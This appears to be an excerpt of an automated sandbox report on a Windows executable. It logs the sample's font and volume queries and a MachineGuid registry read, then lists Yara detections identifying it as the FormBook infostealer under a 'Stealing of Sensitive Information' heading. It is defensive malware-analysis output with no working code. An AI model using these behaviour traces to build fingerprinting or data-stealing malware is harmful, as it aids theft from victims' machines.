Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
